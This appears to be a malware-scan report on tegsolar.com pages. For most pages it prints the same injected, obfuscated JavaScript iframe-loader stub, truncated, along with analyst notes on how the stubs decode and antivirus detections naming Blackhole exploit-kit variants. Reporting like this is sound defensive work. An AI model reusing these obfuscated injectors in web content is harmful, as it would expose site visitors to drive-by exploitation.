Request | Server response | Status |
http://www.tegsolar.com/ | 200 OK Content-Length: 9813 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
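... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));
Analyst note: the excerpt is truncated (3632 bytes omitted), so it cannot be decoded in full from this page. What is visible is a decoder stub: the comma-separated values are parsed as hexadecimal (the radix is `nqdieb*4`, and `nqdieb` is only assigned when `document.querySelector` exists), 78 is subtracted from each, and the result is turned into a string with `String.fromCharCode` and passed to `eval` through the alias `nvfsbq`. The `eval` call is gated on `ktpfi`, which is only assigned in the `catch` handler around `--(hhyg.body)`, so the payload appears to run only where that statement throws, which looks like a check against script emulators. Applying the visible arithmetic to the visible values gives a function that calls `document.createElement('iframe')` and, at the end, sets a `visited_uq` cookie before calling that function; the iframe address lies in the omitted bytes. The same snippet is repeated in the other HTML rows of this report, which is consistent with files having been modified on the server rather than a single page being affected.
Antivirus reports:
- Avast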
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_g.js | 200 OK Content-Length: 5503 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) bidub="y";miu="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[miu].getElementById("asd"))==null}()}catch(toe){sfv=function(sczgj){sczgj="fr"+"omCh"+sczgj;for(uugx=0;uugx<bidub.length;uugx++){aqkk+=String[sczgj](bkgnn(etyt+(bidub[uugx]))-(83));}};};bkgnn=(window.eval);etyt="0x";jxefy=0;try{;}catch(ochmrn){jxefy=1}if(!jxefy){try{++bkgnn(miu)["\x62o"+"d"+bidub]}catch(toe){mkmmoz="^";}bidub="73^b9^c8^c1^b6^c7^bc^c2^c1^73^b8^b6^b9^c8^b4^83^8c^7b^7c^73^ce^60^5d^73^c9^b4^c
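... 3779 bytes are skipped ...bf^b8^c1^7f^73^b8^c1^b7^73^7c^73^7c^8e^60^5d^d0^60^5d^bc^b9^73^7b^c1^b4^c9^bc^ba^b4^c7^c2^c5^81^b6^c2^c2^be^bc^b8^98^c1^b4^b5^bf^b8^b7^7c^60^5d^ce^60^5d^bc^b9^7b^9a^b8^c7^96^c2^c2^be^bc^b8^7b^7a^c9^bc^c6^bc^c7^b8^b7^b2^c8^c4^7a^7c^90^90^88^88^7c^ce^d0^b8^bf^c6^b8^ce^a6^b8^c7^96^c2^c2^be^bc^b8^7b^7a^c9^bc^c6^bc^c7^b8^b7^b2^c8^c4^7a^7f^73^7a^88^88^7a^7f^73^7a^84^7a^7f^73^7a^82^7a^7c^8e^60^5d^60^5d^b8^b6^b9^c8^b4^83^8c^7b^7c^8e^60^5d^d0^60^5d^d0".split(mkmmoz);aqkk="";sfv("arCode");bkgnn(""+aqkk);}
Analyst note: the excerpt is truncated (3779 bytes omitted), so it cannot be decoded in full from this page. This is a second encoding of the same kind of stub: the values are separated by `^`, each is prefixed with `0x` and evaluated, 83 is subtracted, and the characters are joined with `String.fromCharCode` (the name is assembled from `"fr"+"omCh"` and `"arCode"`) before the result is passed to `window.eval` through the alias `bkgnn`. The decoder function `sfv` and the separator `mkmmoz` are only assigned inside `catch` handlers, so decoding appears to depend on the preceding statements throwing, which looks like a check against script emulators. The visible tail decodes to a `navigator.cookieEnabled` test and a `visited_uq` cookie check that limits the payload to one run per visitor; what the payload loads lies in the omitted bytes. Because this file is a shared `.js` resource, any page that includes it is affected even if its own HTML is clean.
Antivirus reports:
- Avast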
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://www.tegsolar.com/index.html | 200 OK Content-Length: 9813 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_003.htm | 200 OK Content-Length: 11440 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_007.htm | 200 OK Content-Length: 10900 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_004.htm | 200 OK Content-Length: 9852 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_002.htm | 200 OK Content-Length: 9986 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_010.htm | 200 OK Content-Length: 9424 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_009.htm | 200 OK Content-Length: 10676 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_008.htm | 200 OK Content-Length: 10359 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) obdwfu="fr"+"omCh"+"arCo"+"de";if(document.querySelector)nqdieb=4;oouz=("6e,b4,c3,bc,b1,c2,b7,bd,bc,6e,c0,b7,b7,bb,c3,7e,87,76,77,6e,c9,5b,58,6e,c4,af,c0,6e,c1,c2,af,c2,b7,b1,8b,75,af,b8,af,c6,75,89,5b,58,6e,c4,af,c0,6e,b1,bd,bc,c2,c0,bd,ba,ba,b3,c0,8b,75,b7,bc,b2,b3,c6,7c,be,b6,be,75,89,5b,58,6e,c4,af,c0,6e,c0,b7,b7,bb,c3,6e,8b,6e,b2,bd,b1,c3,bb,b3,bc,c2,7c,b1,c0,b3,af,c2,b3,93,ba,b3,bb,b3,bc,c2,76,75,b7,b4,c0,af,bb,b3,75,77,89,5b,58,5b,58,6e,c0,b7,b7,bb,c3,7c,c1,c0,b1,6e,8b,6e,75,b6,c2,c2,be,8
... 3632 bytes are skipped ...ad,c3,bf,75,77,8b,8b,83,83,77,c9,cb,b3,ba,c1,b3,c9,a1,b3,c2,91,bd,bd,b9,b7,b3,76,75,c4,b7,c1,b7,c2,b3,b2,ad,c3,bf,75,7a,6e,75,83,83,75,7a,6e,75,7f,75,7a,6e,75,7d,75,77,89,5b,58,5b,58,c0,b7,b7,bb,c3,7e,87,76,77,89,5b,58,cb,5b,58,cb".split(","));nvfsbq=eval;function ezrxtg(){zhimei=function(){--(hhyg.body)}()}hhyg=document;for(fnn=0;fnn<oouz["length"];fnn+=1){oouz[fnn]=-(78)+parseInt(oouz[fnn],nqdieb*4);}try{ezrxtg()}catch(rvikp){ktpfi=50-50;}if(!ktpfi)nvfsbq(String[obdwfu].apply(String,oouz));Antivirus reports:- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- TrendMicro-HouseCall
- TROJ_GEN.F47V0103
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.tegsolar.com/tegsolar_006.htm | 200 OK Content-Length: 10540 Content-Type: text/html | malicious |
